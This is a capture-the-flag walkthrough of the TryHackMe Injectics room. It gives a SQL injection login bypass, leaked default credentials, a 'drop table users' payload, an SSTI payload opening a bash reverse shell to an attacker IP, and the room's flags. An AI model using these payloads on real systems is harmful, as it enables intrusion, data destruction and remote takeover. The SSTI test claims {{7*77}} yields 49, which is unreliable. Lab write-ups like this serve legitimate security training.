Web Application Pentesting: Injection Attacks in the TryHackMe Injectics Room

Web application security is critical in today’s interconnected digital environment. Injection vulnerabilities are one of the most common and dangerous issues. In this blog, I’ll walk you through exploiting injection vulnerabilities in the TryHackMe Injectics Room. This challenge demonstrates how to uncover and leverage vulnerabilities to take control of a web application — ethically, of course!

Setup and Challenge Overview

The Injectics challenge tasks you with uncovering vulnerabilities in a web application. To start:

• Target IP Address: 10.10.90.229
• Required Tools: Burp Suite, browser, and netcat.
• Goal: Extract two flags by exploiting vulnerabilities in the application.

Let’s dive in!

Step 1: Inspect the Web Application

Initial Clue: Always inspect the page source when starting your recon. Here, we find an important comment:

<!-- Website developed by John Tim - dev@injectics.thm -->
<!-- Mails are stored in mail.log file -->

This hints at a log file located at /mail.log. Visiting http://10.10.90.229/mail.log reveals:

From: dev@injectics.thm
To: superadmin@injectics.thm
Subject: Update before holidays

Hey,
Before heading off on holidays, I wanted to update you on the latest changes to the website. I have implemented several enhancements and enabled a special service called Injectics. This service continuously monitors the database to ensure it remains in a stable state.
To add an extra layer of safety, I have configured the service to automatically insert default credentials into the `users` table if it is ever deleted or becomes corrupted. This ensures that we always have a way to access the system and perform necessary maintenance. I have scheduled the service to run every minute.
Here are the default credentials that will be added:
| Email                     | Password              |
|---------------------------|-----------------------|
| superadmin@injectics.thm  | superSecurePasswd101  |
| dev@injectics.thm         | devPasswd123          |
Best regards,  
Dev Team

Step 2: Exploit the Admin Login

Navigating to the admin login page (http://10.10.90.229/adminLogin007.php) reveals two input fields for email and password.

Method 1: SQL Injection

Use Burp Suite to capture the login request and test manual SQL payloads or use wordlists like the PayloadBox SQL Injection Payload List. A working payload might be:

' OR 'x'='x'#;

Method 2: Default Credentials

After exploring, you can log in using the default credentials provided in the /mail.log file:

• Email: superadmin@injectics.thm
• Password: superSecurePasswd101

Step 3: Manipulating the Database

Once logged in, proceed to the update table section and use Burp Suite to intercept requests. Test dropping the users table with this SQL payload:

drop table users -- -

After executing this, the system automatically restores the default credentials within a minute (as per the /mail.log hint).

• Log out and log back in with:
• Email: superadmin@injectics.thm
• Password: superSecurePasswd101

The flag will be:

THM{INJECTICS_ADMIN_PANEL_007}

Step 4: Exploiting SSTI Vulnerabilities

Navigate to the profile section and test the input fields for Server-Side Template Injection (SSTI) by entering:

{{7*77}}

If the output is 49, it confirms the vulnerability. Use this to execute commands. For a reverse shell, use the following payload:

{{ ["bash -c 'exec bash -i >& /dev/tcp/10.17.1.1/4445 0>&1'", ""] | sort('passthru') }}

Step 5: Establishing Reverse Shell

• Start a netcat listener on your attacking machine:

nc -lvnp 4445

• Submit the SSTI payload. Once executed, you’ll gain shell access to the server.

Step 6: Retrieving the Hidden Flag

With shell access, navigate to the flags directory:

cd flags
cat file.txt

The flag will be:

THM{5735172b6c147f4dd649872f73e0fdea}

Conclusion

This challenge showcased how web applications can be vulnerable to SQL Injection and SSTI. The key takeaways are:

1. Always inspect the application’s source and logs for clues.
2. SQL Injection remains a powerful attack vector when input sanitization is weak.
3. SSTI vulnerabilities can lead to complete server compromise if not mitigated.

As ethical hackers, it’s our responsibility to find and report these vulnerabilities, helping developers secure their applications. Remember: With great power comes great responsibility.

Happy hacking!